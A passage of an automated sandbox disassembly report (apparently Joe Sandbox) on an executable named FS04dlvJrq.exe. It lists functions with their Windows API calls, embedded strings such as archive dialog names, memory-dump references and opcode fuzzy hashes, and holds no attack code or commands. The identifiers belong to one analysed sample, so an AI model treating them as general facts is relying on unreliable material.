                                                                                              • SetLastError.KERNEL32(00000000,?,00E8535E), ref: 00E90100
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 9e105a3f68ca59b77281ffad7147276d54ca6a5ea9f77ec39d3c9f6594d069c2
                                                                                              • Instruction ID: cf12a52c08ccf3a826f8f25fb00114e8c5b8676a57d43eb5f8229454bcffbb86
                                                                                              • Opcode Fuzzy Hash: 9e105a3f68ca59b77281ffad7147276d54ca6a5ea9f77ec39d3c9f6594d069c2
                                                                                              • Instruction Fuzzy Hash: 35017872145701AF8F22B775AC86F6B26ABDFC1375BB22426F505B3192FE708C459230
                                                                                              Function 00E934AF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00E934C7
                                                                                                • Part of subcall function 00E903D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?), ref: 00E903EA
                                                                                                • Part of subcall function 00E903D4: GetLastError.KERNEL32(?,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?,?), ref: 00E903FC
                                                                                              • _free.LIBCMT ref: 00E934D9
                                                                                              • _free.LIBCMT ref: 00E934EB
                                                                                              • _free.LIBCMT ref: 00E934FD
                                                                                              • _free.LIBCMT ref: 00E9350F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 4d9f35e5e1a82968686c068a673a3977e549182ffcbeafd1d404f69d2947ba5c
                                                                                              • Instruction ID: 6f3b04c6af4507e352fac348d5a8f913eb551042440924554798020f4dc1ae18
                                                                                              • Opcode Fuzzy Hash: 4d9f35e5e1a82968686c068a673a3977e549182ffcbeafd1d404f69d2947ba5c
                                                                                              • Instruction Fuzzy Hash: E9F0FF72504200AF8F20DBA9F886C5677D9AF4971479AA805F418F7902CB74FD808750
                                                                                              Function 00E8F7C0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00E8F7DE
                                                                                                • Part of subcall function 00E903D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?), ref: 00E903EA
                                                                                                • Part of subcall function 00E903D4: GetLastError.KERNEL32(?,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?,?), ref: 00E903FC
                                                                                              • _free.LIBCMT ref: 00E8F7F0
                                                                                              • _free.LIBCMT ref: 00E8F803
                                                                                              • _free.LIBCMT ref: 00E8F814
                                                                                              • _free.LIBCMT ref: 00E8F825
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: ce998d33ccd3f2f3c5769e7180282e6d677984eeaab92eecb6334397a7548d0a
                                                                                              • Instruction ID: 37cb1468feb311e0380ff9f2dbce5d94adbf1ba61b42ff7c40f7cb3714281ca2
                                                                                              • Opcode Fuzzy Hash: ce998d33ccd3f2f3c5769e7180282e6d677984eeaab92eecb6334397a7548d0a
                                                                                              • Instruction Fuzzy Hash: 8FF019714107209FDB11EF26BC5240677E1FB59B29355131BF41976272CB796849CB81
                                                                                              Function 00E81F82 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E71309: __EH_prolog3.LIBCMT ref: 00E71310
                                                                                                • Part of subcall function 00E71309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00E717FB,?,?,\\?\,522FB702,?,?,?,00000000,00E9A279,000000FF), ref: 00E71319
                                                                                                • Part of subcall function 00E71AD1: __EH_prolog3_GS.LIBCMT ref: 00E71AD8
                                                                                                • Part of subcall function 00E6F763: __EH_prolog3_GS.LIBCMT ref: 00E6F76A
                                                                                                • Part of subcall function 00E6F58B: __EH_prolog3_GS.LIBCMT ref: 00E6F592
                                                                                                • Part of subcall function 00E6F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,00E6A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00E6F5A8
                                                                                                • Part of subcall function 00E6F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049), ref: 00E6F5EB
                                                                                              • SHFileOperationW.SHELL32(?,00000000,?,?,?,00000000), ref: 00E82137
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00E822BE
                                                                                              • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00E822D8
                                                                                                • Part of subcall function 00E714CC: __EH_prolog3_GS.LIBCMT ref: 00E714D3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
                                                                                              • String ID: .tmp
                                                                                              • API String ID: 1688541384-2986845003
                                                                                              • Opcode ID: d43da68a48316ffe0100a662a992989ac4ccafb75bc0c62bce4c34002498b595
                                                                                              • Instruction ID: 8ddb4bf05cb996ded16f5ac40e523c453a125f3b34fb1ed546f868e1a9604bae
                                                                                              • Opcode Fuzzy Hash: d43da68a48316ffe0100a662a992989ac4ccafb75bc0c62bce4c34002498b595
                                                                                              • Instruction Fuzzy Hash: 0CC1EF71C002689ADB21EBA4DC85BDDB7B8BF08344F5451EAE54DB3251DB30AB89CF60
                                                                                              Function 00E7EF21 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 240COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E7EBAA: GetDC.USER32(00000000), ref: 00E7EBAE
                                                                                                • Part of subcall function 00E7EBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E7EBB9
                                                                                                • Part of subcall function 00E7EBAA: ReleaseDC.USER32(00000000,00000000), ref: 00E7EBC4
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00E7EF65
                                                                                                • Part of subcall function 00E7F1EC: GetDC.USER32(00000000), ref: 00E7F1F5
                                                                                                • Part of subcall function 00E7F1EC: GetObjectW.GDI32(?,00000018,?), ref: 00E7F224
                                                                                                • Part of subcall function 00E7F1EC: ReleaseDC.USER32(00000000,?), ref: 00E7F2BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: ($kJ
                                                                                              • API String ID: 1061551593-2474376059
                                                                                              • Opcode ID: d337e138ea4c317f5a21e3de9f3e2398b7c7e08f326758263c7a5fe0758236a2
                                                                                              • Instruction ID: 7f070719012c1a2c5dbf88ba4374ee6faa8257c30a487dc884065fcf66d8fa92
                                                                                              • Opcode Fuzzy Hash: d337e138ea4c317f5a21e3de9f3e2398b7c7e08f326758263c7a5fe0758236a2
                                                                                              • Instruction Fuzzy Hash: B69112716087109FC710DF66C844A6BBBE9FFC9B00F50495EF58AE7260CB30A905CB62
                                                                                              Function 00E8EE2A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\FS04dlvJrq.exe,00000104), ref: 00E8EE6A
                                                                                              • _free.LIBCMT ref: 00E8EF35
                                                                                              • _free.LIBCMT ref: 00E8EF3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                              • API String ID: 2506810119-2498539883
                                                                                              • Opcode ID: 0957d3844ed9145df00ee73f30aaa291800e5955b5685173560e03ec87fa133d
                                                                                              • Instruction ID: 3401e9c0a477fa69fe9a65d06de0821ba54e94c2378de5ca41d8d1769c0efd6c
                                                                                              • Opcode Fuzzy Hash: 0957d3844ed9145df00ee73f30aaa291800e5955b5685173560e03ec87fa133d
                                                                                              • Instruction Fuzzy Hash: F9317C71A04258AFCB21EB9A9C8199EBBFCEB85314F1450ABF90CB7311D7709E44DB90
                                                                                              Function 00E801DD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_wcslen
                                                                                              • String ID: VL$`L
                                                                                              • API String ID: 3746244732-1947195591
                                                                                              • Opcode ID: 39b15aed47031253fa10b47129da2998f7a6dc89a7960a05058acacdadb3cf50
                                                                                              • Instruction ID: 70fa9e91a354fa0f49b605ca25fa270683cb913fa7f81dec76575dc10f71e702
                                                                                              • Opcode Fuzzy Hash: 39b15aed47031253fa10b47129da2998f7a6dc89a7960a05058acacdadb3cf50
                                                                                              • Instruction Fuzzy Hash: D1415A71A00109AFDF04EFA8DD899EE77B9FF09344B145119F859BB2A1DB70AD04CB64
                                                                                              Function 00E89E56 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E89E7B
                                                                                              • _abort.LIBCMT ref: 00E89F86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer_abort
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 948111806-2084237596
                                                                                              • Opcode ID: 27b9d089bcbe6ae7f5b42efaeda618e834a9ccd3e206f2ba82e4b3ca90390f1b
                                                                                              • Instruction ID: 756dc7061f90d79e72a67d11af64540c44b5021d5bce52239b7c866e608e16bd
                                                                                              • Opcode Fuzzy Hash: 27b9d089bcbe6ae7f5b42efaeda618e834a9ccd3e206f2ba82e4b3ca90390f1b
                                                                                              • Instruction Fuzzy Hash: 3F413A71E00209AFCF16EF94CD81ABEBBB5BF48308F185159FA0DB6262D335A950DB50
                                                                                              Function 00E7338E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __fprintf_l.LIBCMT ref: 00E7340E
                                                                                              • _strncpy.LIBCMT ref: 00E73459
                                                                                                • Part of subcall function 00E789ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00EAE088,?,00000007,00E733E2,?,?,00000050,522FB702), ref: 00E78A0A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 562999700-834177443
                                                                                              • Opcode ID: 00f52f03dafc5476a8edeb5d268dfc4ab6b4257b40e0dc913485543afce648a2
                                                                                              • Instruction ID: 22dc8f908b3dc92c301e3f18d28ffdf6fa5b88708ebb4515752ec6eed6387470
                                                                                              • Opcode Fuzzy Hash: 00f52f03dafc5476a8edeb5d268dfc4ab6b4257b40e0dc913485543afce648a2
                                                                                              • Instruction Fuzzy Hash: 0021817250070DABDB14DE78CC45EAE7BE8BB04300F145516FA28E7291E731EA15DB61
                                                                                              Function 00E7F8F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E7F8F7
                                                                                                • Part of subcall function 00E61E44: GetDlgItem.USER32(00000000,00003021), ref: 00E61E88
                                                                                                • Part of subcall function 00E61E44: SetWindowTextW.USER32(00000000,00E9C6C8), ref: 00E61E9E
                                                                                              • EndDialog.USER32(?,00000001), ref: 00E7F99F
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 00E7F9E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogH_prolog3_Window
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 2321058237-3402441367
                                                                                              • Opcode ID: fb1657171ba4c87966f6e3050047d1165c8413d98a6bf6dd89c624d5d256de46
                                                                                              • Instruction ID: 1ec6ad553c2d8b4674827532bc43e10ba5ccf3dbd7963291a104220e490b7cf5
                                                                                              • Opcode Fuzzy Hash: fb1657171ba4c87966f6e3050047d1165c8413d98a6bf6dd89c624d5d256de46
                                                                                              • Instruction Fuzzy Hash: FE218232640105BFDB15EFA4DC56FAE37A8AF8A344F04A065F649BB2A5C731D905CB22
                                                                                              Function 00E7FA79 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E7FEA7: GetCurrentProcess.KERNEL32(00020008,?), ref: 00E7FEB6
                                                                                                • Part of subcall function 00E7FEA7: GetLastError.KERNEL32 ref: 00E7FEE1
                                                                                              • CreateDirectoryW.KERNEL32(?,?), ref: 00E7FB23
                                                                                              • LocalFree.KERNEL32(?), ref: 00E7FB31
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                              • String ID: .L$tL
                                                                                              • API String ID: 1077098981-2777569843
                                                                                              • Opcode ID: f9316cd9be40c71e79a6f11220effe5f8d7e967f9ba11622bc57ea294b5e41c8
                                                                                              • Instruction ID: a19d1b9f1ec336b585f269ef396e530a19934a02294a27817f3504663571af44
                                                                                              • Opcode Fuzzy Hash: f9316cd9be40c71e79a6f11220effe5f8d7e967f9ba11622bc57ea294b5e41c8
                                                                                              • Instruction Fuzzy Hash: 5621C6B59002099FDB10DFA6D8849EEBBF8FF49354F10852AE819E7110D734DA19CBA1
                                                                                              Function 00E77445 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00E6FEBD,00000008,00000004,00E72D42,?,?,?,?,00000000,00E7ABB6,?), ref: 00E77484
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00E6FEBD,00000008,00000004,00E72D42,?,?,?,?,00000000), ref: 00E7748E
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00E6FEBD,00000008,00000004,00E72D42,?,?,?,?,00000000), ref: 00E7749E
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 00E774B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              • Opcode ID: f81f17465de770df2dada66f9dcefa7ecebb418b4e3949f7886552cfbd24cfe3
                                                                                              • Instruction ID: 0bfdff9c4f4e0857e53120d76acb3c3fe4810be3ec900044af733b5ab30c4520
                                                                                              • Opcode Fuzzy Hash: f81f17465de770df2dada66f9dcefa7ecebb418b4e3949f7886552cfbd24cfe3
                                                                                              • Instruction Fuzzy Hash: 6711A7B1648705AFC3215F769CC59A7FFECEB59748F10582EF1EDD2200E67059848B50
                                                                                              Function 00E8406A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              • Opcode ID: 5b94e8b6a842913fd3ad60f4296f8aabc2c9d503f687e5387cbf0be216ccc51c
                                                                                              • Instruction ID: bfdef2ed868b39dc1d014c6d55146596fa42edd98ed6765bc545e8ddea07c140
                                                                                              • Opcode Fuzzy Hash: 5b94e8b6a842913fd3ad60f4296f8aabc2c9d503f687e5387cbf0be216ccc51c
                                                                                              • Instruction Fuzzy Hash: 3E1170B1305301AFD715EF2AED48A177BE8E749385B04152AF64DF33A0D2719848DB62
                                                                                              Function 00E61E44 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E73EAA: _swprintf.LIBCMT ref: 00E73EEA
                                                                                                • Part of subcall function 00E73EAA: _strlen.LIBCMT ref: 00E73F0B
                                                                                                • Part of subcall function 00E73EAA: SetDlgItemTextW.USER32(?,00EA919C,?), ref: 00E73F64
                                                                                                • Part of subcall function 00E73EAA: GetWindowRect.USER32(?,?), ref: 00E73F9A
                                                                                                • Part of subcall function 00E73EAA: GetClientRect.USER32(?,?), ref: 00E73FA6
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00E61E88
                                                                                              • SetWindowTextW.USER32(00000000,00E9C6C8), ref: 00E61E9E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0$gI
                                                                                              • API String ID: 2622349952-269445949
                                                                                              • Opcode ID: 7bf5dc2af928c1d01f709ffdecfdace228e5cc3b352e1872b280881dcdc89ff2
                                                                                              • Instruction ID: 643ac6f04bd0c679d714320f94d30e42d84446c8676564e4caf4e4e60ccd40b6
                                                                                              • Opcode Fuzzy Hash: 7bf5dc2af928c1d01f709ffdecfdace228e5cc3b352e1872b280881dcdc89ff2
